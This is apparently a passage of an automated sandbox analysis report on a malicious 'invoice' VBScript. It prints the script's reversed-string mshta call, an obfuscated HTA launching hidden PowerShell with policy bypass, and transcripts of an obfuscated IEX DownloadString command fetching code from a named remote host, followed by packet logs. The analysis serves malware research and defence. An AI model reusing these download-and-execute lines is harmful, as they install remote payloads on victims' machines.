                                                            Preview: <script language=javascript>document.write(unescape('%3C%48%54%4D%4C%3E%20%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%75%74%66%2D%38%22%3E%0A%3C%48%45%41%44%3E%20%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0A%57%69%6E%64%6F%77%2E%52%65%53%69%7A%65%54%6F%20%30%2C%20%30%0A%57%69%6E%64%6F%77%2E%6D%6F%76%65%54%6F%20%2D%32%30%30%30%2C%2D%32%30%30%30%0A%53%65%74%20%6F%62%6A%53%68%65%6C%6C%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%63%74%28%22%57%73%63%72%69%70%74%2E%53%68%65%6C%6C%22%29%0A%6F%62%6A%53%68%65%6C%6C%2E%52%75%6E%20%22%70%6F%77%22%20%26%20%22%65%72%73%68%65%6C%6C%20%2D%77%69%6E%64%6F%20%31%20%2D%6E%6F%65%78%69%74%20%2D%65%78%65%63%20%62%79%70%61%73%73%20%2D%66%69%6C%65%20%22%22%43%3A%5C%55%73%65%72%73%5C%50%75%62%6C%69%63%5C%4D%69%63%72%6F%73%6F%66%74%2E%70%73%31%22%2C%30%0A%73%65%6C%66%2E%63%6C%6F%73%6
                                                            C:\Users\user\Documents\20210227\PowerShell_transcript.642294.nqkS_Vsp.20210227191803.txt
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):978
                                                            Entropy (8bit):5.55606306965382
                                                            Encrypted:false
                                                            SSDEEP:24:BxSAm7vBZYex2DOXUWvZj1/2WaHjeTKKjX4CIym1ZJX6Zj1/a:BZMvjYeoORNxaqDYB1ZCNa
                                                            MD5:EAB71FDC0CDB2716CD0F6BDD6D464B91
                                                            SHA1:6B33C77EC1D0D4ECD0845A485AD90368F33FC110
                                                            SHA-256:A9AA5ED892FE880B97D3C8EAE31F8D1BAAE4CA39C3790BEC10740409ADB1FCD2
                                                            SHA-512:7BACADEE96067E556ED2798783434EFE83012583FBD781A2EDB6C5F5030A0F597811EC8CB8E7860DAC5FCDF7BBEA9A0A6B6B15888DF44173EFDBF5AB2D558BC8
                                                            Malicious:false
                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210227191803..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X..Process ID: 1320..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210227191803..**********************..PS>$c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X..
                                                            C:\Users\user\Documents\20210227\PowerShell_transcript.642294.s3EPy3U8.20210227191828.txt
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2531
                                                            Entropy (8bit):5.413207795562998
                                                            Encrypted:false
                                                            SSDEEP:48:BZIvjYeoOaMZF0qDYB1ZhZJMvjYeoOaMZF0qDYB1Z/69pJ1vqAfG7eJ1vqAfG7d:BZwjDNfCqDo1ZhZJcjDNfCqDo1Z/GpTs
                                                            MD5:D1E3129207E510FF7FAD75D80B2F62B3
                                                            SHA1:D691D48096CB538F33928656D469F237F8CFAF09
                                                            SHA-256:C474E79A5AF3C5316E2314B63B31318C02DF31FD7C73EAF898BC84CD48497EDB
                                                            SHA-512:8269E84185E526D08428A548BB1B88F3406DAEF46A64A0F57D180F36EE5F1C094E5BF51764A293068C6B32082BD3BD387926C85EEA0651079859407B68908CC4
                                                            Malicious:false
                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210227191829..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1..Process ID: 2240..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20210227192259..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec b
                                                            C:\Users\user\Documents\20210227\PowerShell_transcript.642294.uVQaZH3a.20210227191828.txt
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2334
                                                            Entropy (8bit):5.364818373181353
                                                            Encrypted:false
                                                            SSDEEP:48:BZPvjYeoOaMZFSqDYB1ZhZOvjYeoOaMZFSqDYB1ZGufZ62pfxKZ62pfxT:BZHjDNfgqDo1ZhZijDNfgqDo1ZGuB6uC
                                                            MD5:908384C3BB1A4D5C6EDF9096233FFBA9
                                                            SHA1:FC4DF4AF5876498428F4576604376E5BDE36A67C
                                                            SHA-256:F7564680D1332A950F9021505A7F776AA52D8B99719664A68DA6E8C0B0BCE626
                                                            SHA-512:F8C8C5BBD1B85317F6203B5DB587534E6F6D8AA9DB7C8927534A6C3835CBC8F7D4C449E2046BD5680ECC4720B12149703C2787E96A8A8FF390BB5DA71ECE98AF
                                                            Malicious:false
                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210227191839..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1..Process ID: 5764..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20210227191841..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec b

                                                            Static File Info

                                                            General

                                                            File type:ASCII text, with CRLF line terminators
                                                            Entropy (8bit):5.326589626467839
                                                            TrID:
                                                              File name:Invoice-ID-(882451).vbs
                                                              File size:243
                                                              MD5:3e338fb0311a9808b97c27f9427ba6fe
                                                              SHA1:9b65363cecd8bec73dcce9501f04a62feeeab228
                                                              SHA256:a517730f91314aaaf2e7843327e8a1d7c09b8e542449152a2725f2d4361b8bb3
                                                              SHA512:67cf4e6348847276c68220cf8f12aeb10cd6c674f5b1034ca3e08876b24892081b28f4f7cf3cc59ded4672a81bede9621f74bb74c28ded9e2d2be997733bf7ce
                                                              SSDEEP:6:YuAuPRizzNkRkizGY7ELHxNKFYvAbxrUU4oKkfXDLyM:YuvR8617ELyYvANruoKk7Lf
                                                              File Content Preview:AAAAAAAAAA = StrReverse("sm\23metsyS\swodniW\")..hhhbbaannkeerrss = "C:"+AAAAAAAAAA+"hta http://ahmedadel.work/cairo/Encoding.txt" ..set hhppll = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")..Execute("hhppll.Run hhhbbaannkeerrss , 0")

                                                              File Icon

                                                              Icon Hash:e8d69ece869a9ec4

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Feb 27, 2021 19:18:02.432118893 CET4970680192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:02.509129047 CET8049706212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:02.509839058 CET4970680192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:02.509869099 CET4970680192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:02.586725950 CET8049706212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:02.587268114 CET8049706212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:02.588094950 CET4970680192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:06.262331009 CET4971080192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:06.334413052 CET8049710212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:06.334559917 CET4971080192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:06.335442066 CET4971080192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:06.407488108 CET8049710212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:06.407830000 CET8049710212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:06.449419975 CET4971080192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:07.588108063 CET8049706212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:07.588294983 CET4970680192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:09.699858904 CET4970680192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:11.413476944 CET8049710212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:11.414638996 CET4971080192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:13.575701952 CET4971080192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:13.646742105 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:13.647882938 CET8049710212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:13.851712942 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:13.852063894 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:13.881953001 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:14.087254047 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.087316036 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.087356091 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.087393999 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.087420940 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.087580919 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:14.087640047 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:14.089788914 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.089824915 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.090034008 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:14.100517988 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:14.328198910 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.367659092 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:14.572885990 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.572945118 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:14.573009968 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:15.577502012 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:15.577558041 CET44349715207.241.228.153192.168.2.4
                                                              Feb 27, 2021 19:18:15.577641964 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:18:21.659501076 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.733278036 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.733412981 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.733598948 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.807256937 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807632923 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807674885 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807723999 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807766914 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807806015 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807813883 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.807846069 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807856083 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.807887077 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807914019 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.807924986 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.807965040 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.808002949 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.808006048 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.808067083 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.881756067 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.881822109 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.881864071 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.881891966 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.881910086 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.881951094 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.881966114 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.881995916 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882038116 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882055998 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.882091999 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882134914 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882148027 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.882173061 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882213116 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882227898 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.882252932 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882291079 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882308960 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.882329941 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882369041 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882389069 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.882417917 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882463932 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882474899 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.882503986 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882543087 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.882561922 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.935033083 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956217051 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956286907 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956329107 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956353903 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956372023 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956412077 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956455946 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956469059 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956513882 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956527948 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956554890 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956594944 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956628084 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956634045 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956671000 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956695080 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956708908 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956748009 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956780910 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956794977 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956837893 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956861019 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956877947 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956916094 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956942081 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.956954956 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.956993103 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957011938 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957032919 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957070112 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957092047 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957118034 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957159996 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957180977 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957196951 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957236052 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957261086 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957273006 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957312107 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957330942 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957353115 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957426071 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957427025 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957473040 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957520962 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957551003 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957562923 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957601070 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957623959 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957638979 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957678080 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957707882 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957715034 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957782984 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.008902073 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.008944035 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.009082079 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.031836987 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.031905890 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.031951904 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.031992912 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032032967 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032063007 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032075882 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032094955 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032116890 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032155991 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032192945 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032195091 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032248020 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032265902 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032305956 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032310009 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032366991 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032423973 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032444954 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032476902 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032515049 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032553911 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032592058 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032619953 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032638073 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032680988 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032715082 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032718897 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032727003 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032758951 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032794952 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032797098 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032835007 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032872915 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032911062 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032912016 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032962084 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032968044 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033020020 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033046961 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033065081 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033104897 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033143044 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033179998 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033214092 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033217907 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033257961 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033302069 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033305883 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033313036 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033349037 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033415079 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033426046 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033468962 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033504009 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033507109 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033546925 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033584118 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033607006 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033622026 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033662081 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033678055 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033710957 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033736944 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033754110 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033792973 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033832073 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033857107 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033935070 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.082794905 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.082850933 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.083015919 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107465982 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107511997 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107552052 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107590914 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107629061 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107669115 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107692003 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107718945 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107718945 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107745886 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107768059 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107805967 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107845068 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107853889 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107886076 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107912064 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107925892 CET8049721212.64.222.172192.168.2.4
